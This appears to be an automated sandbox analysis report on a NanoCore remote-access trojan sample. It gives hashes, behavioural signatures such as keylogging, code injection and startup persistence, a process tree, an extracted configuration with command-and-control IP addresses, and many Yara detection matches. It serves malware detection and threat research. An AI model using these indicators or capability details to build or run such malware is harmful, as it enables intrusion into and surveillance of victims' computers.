Play interactive tour

Edit tour

Analysis Report e5bd3238d220c97cd4d6969abb3b33e0

Overview

General Information

Sample Name:	e5bd3238d220c97cd4d6969abb3b33e0 (renamed file extension from none to exe)
Analysis ID:	320085
MD5:	7b00ed250c793c95f4d98c637302fb6f
SHA1:	7f8d0c101fa8c5e875aa76c9a9c139d8800867b3
SHA256:	5108996bad93e37f7f6e003be1edf9dba10a99fafc3894f8d4fd01226e10b0a5
Tags:	NanoCore
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

Yara detected Nanocore RAT

.NET source code contains potential unpacker

Allocates memory in foreign processes

AutoIt script contains suspicious strings

Binary is likely a compiled AutoIt script file

Contains functionality to inject code into remote processes

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Uses dynamic DNS services

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains strange resources

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

e5bd3238d220c97cd4d6969abb3b33e0.exe (PID: 2152 cmdline: 'C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe' MD5: 7B00ED250C793C95F4D98C637302FB6F)

RegAsm.exe (PID: 4560 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)

dhcpmon.exe (PID: 6488 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

DiagnosticsHub.StandardCollector.Service.exe.bat (PID: 6976 cmdline: 'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat' MD5: E10CD6FAB33374FB1A0002F89D0BFE45)

RegAsm.exe (PID: 7108 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)

cleanup

Malware Configuration

Threatname: NanoCore

{"C2: ": ["255.255.255.255", "87.65.28.27"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x23a47:$a: NanoCore 0x23aa0:$a: NanoCore 0x23add:$a: NanoCore 0x23b56:$a: NanoCore 0x23aa9:$b: ClientPlugin 0x23ae6:$b: ClientPlugin 0x243e4:$b: ClientPlugin 0x243f1:$b: ClientPlugin 0x1b2a5:$e: KeepAlive 0x23f31:$g: LogClientMessage 0x23eb1:$i: get_Connected 0x15a79:$j: #=q 0x15aa9:$j: #=q 0x15ae5:$j: #=q 0x15b0d:$j: #=q 0x15b3d:$j: #=q 0x15b6d:$j: #=q 0x15b9d:$j: #=q 0x15bcd:$j: #=q 0x15be9:$j: #=q 0x15c19:$j: #=q
0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x112dd:$x1: NanoCore.ClientPluginHost 0x43ce5:$x1: NanoCore.ClientPluginHost 0x766ed:$x1: NanoCore.ClientPluginHost 0x1131a:$x2: IClientNetworkHost 0x43d22:$x2: IClientNetworkHost 0x7672a:$x2: IClientNetworkHost 0x14e4d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x47855:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x7a25d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x11045:$a: NanoCore 0x11055:$a: NanoCore 0x11289:$a: NanoCore 0x1129d:$a: NanoCore 0x112dd:$a: NanoCore 0x43a4d:$a: NanoCore 0x43a5d:$a: NanoCore 0x43c91:$a: NanoCore 0x43ca5:$a: NanoCore 0x43ce5:$a: NanoCore 0x76455:$a: NanoCore 0x76465:$a: NanoCore 0x76699:$a: NanoCore 0x766ad:$a: NanoCore 0x766ed:$a: NanoCore 0x110a4:$b: ClientPlugin 0x112a6:$b: ClientPlugin 0x112e6:$b: ClientPlugin 0x43aac:$b: ClientPlugin 0x43cae:$b: ClientPlugin 0x43cee:$b: ClientPlugin
0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xfc2d:$x1: NanoCore.ClientPluginHost 0xfc6a:$x2: IClientNetworkHost 0x1379d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf995:$a: NanoCore 0xf9a5:$a: NanoCore 0xfbd9:$a: NanoCore 0xfbed:$a: NanoCore 0xfc2d:$a: NanoCore 0xf9f4:$b: ClientPlugin 0xfbf6:$b: ClientPlugin 0xfc36:$b: ClientPlugin 0xfb1b:$c: ProjectData 0x10522:$d: DESCrypto 0x17eee:$e: KeepAlive 0x15edc:$g: LogClientMessage 0x120d7:$i: get_Connected 0x10858:$j: #=q 0x10888:$j: #=q 0x108a4:$j: #=q 0x108d4:$j: #=q 0x108f0:$j: #=q 0x1090c:$j: #=q 0x1093c:$j: #=q 0x10958:$j: #=q
0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x101a5:$x1: NanoCore.ClientPluginHost 0x101e2:$x2: IClientNetworkHost 0x13d15:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xff0d:$a: NanoCore 0xff1d:$a: NanoCore 0x10151:$a: NanoCore 0x10165:$a: NanoCore 0x101a5:$a: NanoCore 0xff6c:$b: ClientPlugin 0x1016e:$b: ClientPlugin 0x101ae:$b: ClientPlugin 0x10093:$c: ProjectData 0x10a9a:$d: DESCrypto 0x18466:$e: KeepAlive 0x16454:$g: LogClientMessage 0x1264f:$i: get_Connected 0x10dd0:$j: #=q 0x10e00:$j: #=q 0x10e1c:$j: #=q 0x10e4c:$j: #=q 0x10e68:$j: #=q 0x10e84:$j: #=q 0x10eb4:$j: #=q 0x10ed0:$j: #=q
0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf2dd:$x1: NanoCore.ClientPluginHost 0xf31a:$x2: IClientNetworkHost 0x12e4d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf045:$a: NanoCore 0xf055:$a: NanoCore 0xf289:$a: NanoCore 0xf29d:$a: NanoCore 0xf2dd:$a: NanoCore 0xf0a4:$b: ClientPlugin 0xf2a6:$b: ClientPlugin 0xf2e6:$b: ClientPlugin 0xf1cb:$c: ProjectData 0xfbd2:$d: DESCrypto 0x1759e:$e: KeepAlive 0x1558c:$g: LogClientMessage 0x11787:$i: get_Connected 0xff08:$j: #=q 0xff38:$j: #=q 0xff54:$j: #=q 0xff84:$j: #=q 0xffa0:$j: #=q 0xffbc:$j: #=q 0xffec:$j: #=q 0x10008:$j: #=q
00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1052d:$x1: NanoCore.ClientPluginHost 0x1056a:$x2: IClientNetworkHost 0x1409d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10295:$a: NanoCore 0x102a5:$a: NanoCore 0x104d9:$a: NanoCore 0x104ed:$a: NanoCore 0x1052d:$a: NanoCore 0x102f4:$b: ClientPlugin 0x104f6:$b: ClientPlugin 0x10536:$b: ClientPlugin 0x1041b:$c: ProjectData 0x10e22:$d: DESCrypto 0x187ee:$e: KeepAlive 0x167dc:$g: LogClientMessage 0x129d7:$i: get_Connected 0x11158:$j: #=q 0x11188:$j: #=q 0x111a4:$j: #=q 0x111d4:$j: #=q 0x111f0:$j: #=q 0x1120c:$j: #=q 0x1123c:$j: #=q 0x11258:$j: #=q
00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3cfcd:$x1: NanoCore.ClientPluginHost 0x3d00a:$x2: IClientNetworkHost 0xf00f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x40b3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3cd35:$a: NanoCore 0x3cd45:$a: NanoCore 0x3cf79:$a: NanoCore 0x3cf8d:$a: NanoCore 0x3cfcd:$a: NanoCore 0x3cd94:$b: ClientPlugin 0x3cf96:$b: ClientPlugin 0x3cfd6:$b: ClientPlugin 0x3cebb:$c: ProjectData 0x3d8c2:$d: DESCrypto 0x4528e:$e: KeepAlive 0x11604:$g: LogClientMessage 0x4327c:$g: LogClientMessage 0x3f477:$i: get_Connected 0xc1de:$j: #=q 0xc45d:$j: #=q 0xd419:$j: #=q 0xe32f:$j: #=q 0xe34b:$j: #=q 0xe37b:$j: #=q 0xe397:$j: #=q
00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3cfcd:$x1: NanoCore.ClientPluginHost 0x3d00a:$x2: IClientNetworkHost 0xf00f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x40b3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3cd35:$a: NanoCore 0x3cd45:$a: NanoCore 0x3cf79:$a: NanoCore 0x3cf8d:$a: NanoCore 0x3cfcd:$a: NanoCore 0x3cd94:$b: ClientPlugin 0x3cf96:$b: ClientPlugin 0x3cfd6:$b: ClientPlugin 0x3cebb:$c: ProjectData 0x3d8c2:$d: DESCrypto 0x4528e:$e: KeepAlive 0x11604:$g: LogClientMessage 0x4327c:$g: LogClientMessage 0x3f477:$i: get_Connected 0xc1de:$j: #=q 0xc45d:$j: #=q 0xd419:$j: #=q 0xe32f:$j: #=q 0xe34b:$j: #=q 0xe37b:$j: #=q 0xe397:$j: #=q
00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xfb25:$x1: NanoCore.ClientPluginHost 0x4252d:$x1: NanoCore.ClientPluginHost 0xfb62:$x2: IClientNetworkHost 0x4256a:$x2: IClientNetworkHost 0x13695:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4609d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf88d:$a: NanoCore 0xf89d:$a: NanoCore 0xfad1:$a: NanoCore 0xfae5:$a: NanoCore 0xfb25:$a: NanoCore 0x42295:$a: NanoCore 0x422a5:$a: NanoCore 0x424d9:$a: NanoCore 0x424ed:$a: NanoCore 0x4252d:$a: NanoCore 0xf8ec:$b: ClientPlugin 0xfaee:$b: ClientPlugin 0xfb2e:$b: ClientPlugin 0x422f4:$b: ClientPlugin 0x424f6:$b: ClientPlugin 0x42536:$b: ClientPlugin 0xfa13:$c: ProjectData 0x4241b:$c: ProjectData 0x1041a:$d: DESCrypto 0x42e22:$d: DESCrypto 0x17de6:$e: KeepAlive
00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x67225:$x1: NanoCore.ClientPluginHost 0x67262:$x2: IClientNetworkHost 0xd377:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x39267:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x6ad95:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x66f8d:$a: NanoCore 0x66f9d:$a: NanoCore 0x671d1:$a: NanoCore 0x671e5:$a: NanoCore 0x67225:$a: NanoCore 0x66fec:$b: ClientPlugin 0x671ee:$b: ClientPlugin 0x6722e:$b: ClientPlugin 0x67113:$c: ProjectData 0x67b1a:$d: DESCrypto 0x6f4e6:$e: KeepAlive 0xf96c:$g: LogClientMessage 0x3b85c:$g: LogClientMessage 0x6d4d4:$g: LogClientMessage 0x696cf:$i: get_Connected 0xa546:$j: #=q 0xa7c5:$j: #=q 0xb781:$j: #=q 0xc697:$j: #=q 0xc6b3:$j: #=q 0xc6e3:$j: #=q
00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x66fcd:$x1: NanoCore.ClientPluginHost 0x6700a:$x2: IClientNetworkHost 0xd11f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3900f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x6ab3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x66d35:$a: NanoCore 0x66d45:$a: NanoCore 0x66f79:$a: NanoCore 0x66f8d:$a: NanoCore 0x66fcd:$a: NanoCore 0x66d94:$b: ClientPlugin 0x66f96:$b: ClientPlugin 0x66fd6:$b: ClientPlugin 0x66ebb:$c: ProjectData 0x678c2:$d: DESCrypto 0x6f28e:$e: KeepAlive 0xf714:$g: LogClientMessage 0x3b604:$g: LogClientMessage 0x6d27c:$g: LogClientMessage 0x69477:$i: get_Connected 0xa2ee:$j: #=q 0xa56d:$j: #=q 0xb529:$j: #=q 0xc43f:$j: #=q 0xc45b:$j: #=q 0xc48b:$j: #=q
00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x33f5:$a: NanoCore 0x344e:$a: NanoCore 0x348b:$a: NanoCore 0x3504:$a: NanoCore 0x16baf:$a: NanoCore 0x16bc4:$a: NanoCore 0x16bf9:$a: NanoCore 0x2f683:$a: NanoCore 0x2f698:$a: NanoCore 0x2f6cd:$a: NanoCore 0x3457:$b: ClientPlugin 0x3494:$b: ClientPlugin 0x3d92:$b: ClientPlugin 0x3d9f:$b: ClientPlugin 0x1696b:$b: ClientPlugin 0x16986:$b: ClientPlugin 0x169b6:$b: ClientPlugin 0x16bcd:$b: ClientPlugin 0x16c02:$b: ClientPlugin 0x2f43f:$b: ClientPlugin 0x2f45a:$b: ClientPlugin
0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xfce5:$x1: NanoCore.ClientPluginHost 0xfd22:$x2: IClientNetworkHost 0x13855:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfa4d:$a: NanoCore 0xfa5d:$a: NanoCore 0xfc91:$a: NanoCore 0xfca5:$a: NanoCore 0xfce5:$a: NanoCore 0xfaac:$b: ClientPlugin 0xfcae:$b: ClientPlugin 0xfcee:$b: ClientPlugin 0xfbd3:$c: ProjectData 0x105da:$d: DESCrypto 0x17fa6:$e: KeepAlive 0x15f94:$g: LogClientMessage 0x1218f:$i: get_Connected 0x10910:$j: #=q 0x10940:$j: #=q 0x1095c:$j: #=q 0x1098c:$j: #=q 0x109a8:$j: #=q 0x109c4:$j: #=q 0x109f4:$j: #=q 0x10a10:$j: #=q
00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x493f5:$a: NanoCore 0x4944e:$a: NanoCore 0x4948b:$a: NanoCore 0x49504:$a: NanoCore 0x5cbaf:$a: NanoCore 0x5cbc4:$a: NanoCore 0x5cbf9:$a: NanoCore 0x75683:$a: NanoCore 0x75698:$a: NanoCore 0x756cd:$a: NanoCore 0x49457:$b: ClientPlugin 0x49494:$b: ClientPlugin 0x49d92:$b: ClientPlugin 0x49d9f:$b: ClientPlugin 0x5c96b:$b: ClientPlugin 0x5c986:$b: ClientPlugin 0x5c9b6:$b: ClientPlugin 0x5cbcd:$b: ClientPlugin 0x5cc02:$b: ClientPlugin 0x7543f:$b: ClientPlugin 0x7545a:$b: ClientPlugin
0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf6ed:$x1: NanoCore.ClientPluginHost 0xf72a:$x2: IClientNetworkHost 0x1325d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf455:$a: NanoCore 0xf465:$a: NanoCore 0xf699:$a: NanoCore 0xf6ad:$a: NanoCore 0xf6ed:$a: NanoCore 0xf4b4:$b: ClientPlugin 0xf6b6:$b: ClientPlugin 0xf6f6:$b: ClientPlugin 0xf5db:$c: ProjectData 0xffe2:$d: DESCrypto 0x179ae:$e: KeepAlive 0x1599c:$g: LogClientMessage 0x11b97:$i: get_Connected 0x10318:$j: #=q 0x10348:$j: #=q 0x10364:$j: #=q 0x10394:$j: #=q 0x103b0:$j: #=q 0x103cc:$j: #=q 0x103fc:$j: #=q 0x10418:$j: #=q
0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x141a5:$x1: NanoCore.ClientPluginHost 0x141e2:$x2: IClientNetworkHost 0x17d15:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x13f0d:$a: NanoCore 0x13f1d:$a: NanoCore 0x14151:$a: NanoCore 0x14165:$a: NanoCore 0x141a5:$a: NanoCore 0x13f6c:$b: ClientPlugin 0x1416e:$b: ClientPlugin 0x141ae:$b: ClientPlugin 0x14093:$c: ProjectData 0x14a9a:$d: DESCrypto 0x1c466:$e: KeepAlive 0x1a454:$g: LogClientMessage 0x1664f:$i: get_Connected 0x14dd0:$j: #=q 0x14e00:$j: #=q 0x14e1c:$j: #=q 0x14e4c:$j: #=q 0x14e68:$j: #=q 0x14e84:$j: #=q 0x14eb4:$j: #=q 0x14ed0:$j: #=q
00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf9d5:$x1: NanoCore.ClientPluginHost 0xfa12:$x2: IClientNetworkHost 0x13545:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
